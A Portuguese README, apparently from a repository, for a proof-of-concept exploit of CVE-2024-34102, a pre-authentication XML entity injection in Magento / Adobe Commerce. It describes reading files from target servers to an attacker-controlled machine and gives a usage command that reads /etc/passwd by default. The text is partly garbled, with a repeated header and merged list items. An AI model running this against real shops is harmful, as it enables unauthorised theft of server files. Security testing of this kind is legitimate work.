
POC para CVE-2024-34102. Um problema de injeção de entidade XML pré-autenticação no Magento / Adobe Commerce.
POC para CVE-2024-34102. Um problema de injeção de entidade XML pré-autenticação no Magento / Adobe Commerce.

Este POC tentará ler arquivos de hosts alvo vulneráveis à recente CVE-2024-34102 do Magento / Adobe Commerce. Este POC é baseado neste aviso de segurança e nesta pesquisa da Assetnote.
Para executar este POC, você precisará de uma máquina com IP público e acessível.
poc.xml contendo os principais payloads./etc/passwd).requestsPara usar este POC contra um único alvo:
python cve-2024-34102.py -u target -ip your-machine-ip -p any-open-port-in-your-machine -r file-to-read-from-target (default is /etc/passwd)
Para quaisquer sugestões ou ideias, entre em contato comigo.
Esta ferramenta é fornecida apenas para fins educacionais. Não incentivo, tolero ou apoio o acesso não autorizado a qualquer sistema ou rede. Use esta ferramenta com responsabilidade e somente em sistemas para os quais você tenha permissão explícita para testar. Quaisquer ações e consequências resultantes do uso indevido desta ferramenta são de sua inteira responsabilidade.